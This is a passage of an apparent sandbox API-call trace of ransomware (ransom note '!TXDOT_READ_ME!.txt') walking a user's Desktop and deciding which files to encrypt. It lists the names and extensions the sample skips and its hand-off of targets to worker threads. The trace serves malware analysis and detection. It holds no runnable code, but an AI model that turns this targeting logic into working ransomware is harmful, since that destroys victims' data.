psz1="C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a") returned="C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a" [0072.790] PathFindExtensionW (pszPath="lDvQFP7B58nzHOr.m4a") returned=".m4a" [0072.790] StrCmpW (psz1=".m4a", psz2=".txd0t") returned -1 [0072.790] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2="bootsect.bak") returned 1 [0072.790] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2="iconcache.db") returned 1 [0072.790] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2="thumbs.db") returned -1 [0072.790] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2=" ransomware ") returned 1 [0072.790] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2=" ransom ") returned 1 [0072.790] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2="debug.txt") returned 1 [0072.790] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2="boot.ini") returned 1 [0072.790] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2="desktop.ini") returned 1 [0072.791] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2="autorun.inf") returned 1 [0072.791] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2="ntuser.dat") returned -1 [0072.791] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2="ntldr") returned -1 [0072.791] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2="ntdetect.com") returned -1 [0072.791] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2="bootfont.bin") returned 1 [0072.791] StrCmpIW (psz1="lDvQFP7B58nzHOr.m4a", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.791] PathFindExtensionW (pszPath="lDvQFP7B58nzHOr.m4a") returned=".m4a" [0072.791] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".m4a") returned 0x0 [0072.791] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.791] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.791] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.791] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.791] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a" [0072.791] SetEvent (hEvent=0x3fc) returned 1 [0072.794] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2419ea80, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x2419ea80, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x22502700, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x27000, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="mspusf.exe", cAlternateFileName="")) returned 1 [0072.794] StrCmpW (psz1="mspusf.exe", psz2=".") returned 1 [0072.794] StrCmpW (psz1="mspusf.exe", psz2="..") returned 1 [0072.794] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.794] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.794] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="mspusf.exe", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\mspusf.exe") returned="C:\\Users\\FD1HVy\\Desktop\\mspusf.exe" [0072.794] PathFindExtensionW (pszPath="mspusf.exe") returned=".exe" [0072.794] StrCmpW (psz1=".exe", psz2=".txd0t") returned -1 [0072.794] StrCmpIW (psz1="mspusf.exe", psz2="bootsect.bak") returned 1 [0072.794] StrCmpIW (psz1="mspusf.exe", psz2="iconcache.db") returned 1 [0072.794] StrCmpIW (psz1="mspusf.exe", psz2="thumbs.db") returned -1 [0072.794] StrCmpIW (psz1="mspusf.exe", psz2=" ransomware ") returned 1 [0072.794] StrCmpIW (psz1="mspusf.exe", psz2=" ransom ") returned 1 [0072.794] StrCmpIW (psz1="mspusf.exe", psz2="debug.txt") returned 1 [0072.794] StrCmpIW (psz1="mspusf.exe", psz2="boot.ini") returned 1 [0072.795] StrCmpIW (psz1="mspusf.exe", psz2="desktop.ini") returned 1 [0072.795] StrCmpIW (psz1="mspusf.exe", psz2="autorun.inf") returned 1 [0072.795] StrCmpIW (psz1="mspusf.exe", psz2="ntuser.dat") returned -1 [0072.795] StrCmpIW (psz1="mspusf.exe", psz2="ntldr") returned -1 [0072.795] StrCmpIW (psz1="mspusf.exe", psz2="ntdetect.com") returned -1 [0072.795] StrCmpIW (psz1="mspusf.exe", psz2="bootfont.bin") returned 1 [0072.795] StrCmpIW (psz1="mspusf.exe", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.795] PathFindExtensionW (pszPath="mspusf.exe") returned=".exe" [0072.795] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".exe") returned=".exe|.bat|.cmd|.url|.mui" [0072.795] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0152430, ftCreationTime.dwHighDateTime=0x1d5edf5, ftLastAccessTime.dwLowDateTime=0xc2c01df0, ftLastAccessTime.dwHighDateTime=0x1d5f02e, ftLastWriteTime.dwLowDateTime=0xc2c01df0, ftLastWriteTime.dwHighDateTime=0x1d5f02e, nFileSizeHigh=0x0, nFileSizeLow=0x13f66, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OifmxvKJj07hQoi0y.ppt", cAlternateFileName="OIFMXV~1.PPT")) returned 1 [0072.795] StrCmpW (psz1="OifmxvKJj07hQoi0y.ppt", psz2=".") returned 1 [0072.795] StrCmpW (psz1="OifmxvKJj07hQoi0y.ppt", psz2="..") returned 1 [0072.795] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.795] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.796] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="OifmxvKJj07hQoi0y.ppt", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt") returned="C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt" [0072.799] PathFindExtensionW (pszPath="OifmxvKJj07hQoi0y.ppt") returned=".ppt" [0072.799] StrCmpW (psz1=".ppt", psz2=".txd0t") returned -1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2="bootsect.bak") returned 1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2="iconcache.db") returned 1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2="thumbs.db") returned -1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2=" ransomware ") returned 1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2=" ransom ") returned 1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2="debug.txt") returned 1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2="boot.ini") returned 1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2="desktop.ini") returned 1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2="autorun.inf") returned 1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2="ntuser.dat") returned 1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2="ntldr") returned 1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2="ntdetect.com") returned 1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2="bootfont.bin") returned 1 [0072.799] StrCmpIW (psz1="OifmxvKJj07hQoi0y.ppt", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.799] PathFindExtensionW (pszPath="OifmxvKJj07hQoi0y.ppt") returned=".ppt" [0072.799] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ppt") returned 0x0 [0072.800] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.800] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.800] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.800] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.800] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt" [0072.800] SetEvent (hEvent=0x3fc) returned 1 [0072.808] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26b5ea80, ftCreationTime.dwHighDateTime=0x1d5e858, ftLastAccessTime.dwLowDateTime=0x79ba9ae0, ftLastAccessTime.dwHighDateTime=0x1d5efb1, ftLastWriteTime.dwLowDateTime=0x79ba9ae0, ftLastWriteTime.dwHighDateTime=0x1d5efb1, nFileSizeHigh=0x0, nFileSizeLow=0x15e85, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="oIyEk1tbor7X9s.bmp", cAlternateFileName="OIYEK1~1.BMP")) returned 1 [0072.808] StrCmpW (psz1="oIyEk1tbor7X9s.bmp", psz2=".") returned 1 [0072.808] StrCmpW (psz1="oIyEk1tbor7X9s.bmp", psz2="..") returned 1 [0072.808] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.808] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.808] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="oIyEk1tbor7X9s.bmp", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp") returned="C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp" [0072.808] PathFindExtensionW (pszPath="oIyEk1tbor7X9s.bmp") returned=".bmp" [0072.808] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0072.808] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2="bootsect.bak") returned 1 [0072.808] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2="iconcache.db") returned 1 [0072.808] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2="thumbs.db") returned -1 [0072.808] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2=" ransomware ") returned 1 [0072.808] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2=" ransom ") returned 1 [0072.808] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2="debug.txt") returned 1 [0072.808] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2="boot.ini") returned 1 [0072.808] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2="desktop.ini") returned 1 [0072.808] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2="autorun.inf") returned 1 [0072.808] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2="ntuser.dat") returned 1 [0072.808] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2="ntldr") returned 1 [0072.808] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2="ntdetect.com") returned 1 [0072.808] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2="bootfont.bin") returned 1 [0072.809] StrCmpIW (psz1="oIyEk1tbor7X9s.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.809] PathFindExtensionW (pszPath="oIyEk1tbor7X9s.bmp") returned=".bmp" [0072.809] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0072.809] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.809] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.809] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.809] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.809] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp" [0072.809] SetEvent (hEvent=0x408) returned 1 [0072.813] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecf7020, ftCreationTime.dwHighDateTime=0x1d5f060, ftLastAccessTime.dwLowDateTime=0xb76abe30, ftLastAccessTime.dwHighDateTime=0x1d5ee2e, ftLastWriteTime.dwLowDateTime=0xb76abe30, ftLastWriteTime.dwHighDateTime=0x1d5ee2e, nFileSizeHigh=0x0, nFileSizeLow=0xacf5, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OO_s81.avi", cAlternateFileName="")) returned 1 [0072.813] StrCmpW (psz1="OO_s81.avi", psz2=".") returned 1 [0072.814] StrCmpW (psz1="OO_s81.avi", psz2="..") returned 1 [0072.814] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.814] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.814] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="OO_s81.avi", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi") returned="C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi" [0072.814] PathFindExtensionW (pszPath="OO_s81.avi") returned=".avi" [0072.814] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0072.814] StrCmpIW (psz1="OO_s81.avi", psz2="bootsect.bak") returned 1 [0072.814] StrCmpIW (psz1="OO_s81.avi", psz2="iconcache.db") returned 1 [0072.814] StrCmpIW (psz1="OO_s81.avi", psz2="thumbs.db") returned -1 [0072.814] StrCmpIW (psz1="OO_s81.avi", psz2=" ransomware ") returned 1 [0072.819] StrCmpIW (psz1="OO_s81.avi", psz2=" ransom ") returned 1 [0072.819] StrCmpIW (psz1="OO_s81.avi", psz2="debug.txt") returned 1 [0072.819] StrCmpIW (psz1="OO_s81.avi", psz2="boot.ini") returned 1 [0072.819] StrCmpIW (psz1="OO_s81.avi", psz2="desktop.ini") returned 1 [0072.819] StrCmpIW (psz1="OO_s81.avi", psz2="autorun.inf") returned 1 [0072.819] StrCmpIW (psz1="OO_s81.avi", psz2="ntuser.dat") returned 1 [0072.819] StrCmpIW (psz1="OO_s81.avi", psz2="ntldr") returned 1 [0072.819] StrCmpIW (psz1="OO_s81.avi", psz2="ntdetect.com") returned 1 [0072.819] StrCmpIW (psz1="OO_s81.avi", psz2="bootfont.bin") returned 1 [0072.819] StrCmpIW (psz1="OO_s81.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.819] PathFindExtensionW (pszPath="OO_s81.avi") returned=".avi" [0072.819] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0072.819] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.819] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.819] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.820] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.820] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi" [0072.820] SetEvent (hEvent=0x408) returned 1 [0072.827] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c778d70, ftCreationTime.dwHighDateTime=0x1d5e836, ftLastAccessTime.dwLowDateTime=0x91a2deb0, ftLastAccessTime.dwHighDateTime=0x1d5ee67, ftLastWriteTime.dwLowDateTime=0x91a2deb0, ftLastWriteTime.dwHighDateTime=0x1d5ee67, nFileSizeHigh=0x0, nFileSizeLow=0xe88a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="PYzrJzKfYy0WH.jpg", cAlternateFileName="PYZRJZ~1.JPG")) returned 1 [0072.827] StrCmpW (psz1="PYzrJzKfYy0WH.jpg", psz2=".") returned 1 [0072.827] StrCmpW (psz1="PYzrJzKfYy0WH.jpg", psz2="..") returned 1 [0072.827] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.827] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.827] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="PYzrJzKfYy0WH.jpg", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg") returned="C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg" [0072.827] PathFindExtensionW (pszPath="PYzrJzKfYy0WH.jpg") returned=".jpg" [0072.827] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2="bootsect.bak") returned 1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2="iconcache.db") returned 1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2="thumbs.db") returned -1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2=" ransomware ") returned 1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2=" ransom ") returned 1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2="debug.txt") returned 1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2="boot.ini") returned 1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2="desktop.ini") returned 1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2="autorun.inf") returned 1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2="ntuser.dat") returned 1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2="ntldr") returned 1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2="ntdetect.com") returned 1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2="bootfont.bin") returned 1 [0072.827] StrCmpIW (psz1="PYzrJzKfYy0WH.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.827] PathFindExtensionW (pszPath="PYzrJzKfYy0WH.jpg") returned=".jpg" [0072.827] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0072.827] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.827] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.828] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.828] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.828] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg" [0072.828] SetEvent (hEvent=0x408) returned 1 [0072.831] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61d5de10, ftCreationTime.dwHighDateTime=0x1d5eecd, ftLastAccessTime.dwLowDateTime=0x46bf2c70, ftLastAccessTime.dwHighDateTime=0x1d5e7ad, ftLastWriteTime.dwLowDateTime=0x46bf2c70, ftLastWriteTime.dwHighDateTime=0x1d5e7ad, nFileSizeHigh=0x0, nFileSizeLow=0x5a3, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="rBWrlFNmCY.bmp", cAlternateFileName="RBWRLF~1.BMP")) returned 1 [0072.831] StrCmpW (psz1="rBWrlFNmCY.bmp", psz2=".") returned 1 [0072.831] StrCmpW (psz1="rBWrlFNmCY.bmp", psz2="..") returned 1 [0072.831] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.989] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.991] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="rBWrlFNmCY.bmp", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp") returned="C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp" [0072.991] PathFindExtensionW (pszPath="rBWrlFNmCY.bmp") returned=".bmp" [0072.991] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2="bootsect.bak") returned 1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2="iconcache.db") returned 1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2="thumbs.db") returned -1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2=" ransomware ") returned 1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2=" ransom ") returned 1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2="debug.txt") returned 1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2="boot.ini") returned 1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2="desktop.ini") returned 1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2="autorun.inf") returned 1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2="ntuser.dat") returned 1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2="ntldr") returned 1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2="ntdetect.com") returned 1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2="bootfont.bin") returned 1 [0072.991] StrCmpIW (psz1="rBWrlFNmCY.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.991] PathFindExtensionW (pszPath="rBWrlFNmCY.bmp") returned=".bmp" [0072.991] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0072.991] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.991] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.991] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.991] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.991] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp", cchMax=32000 | out: 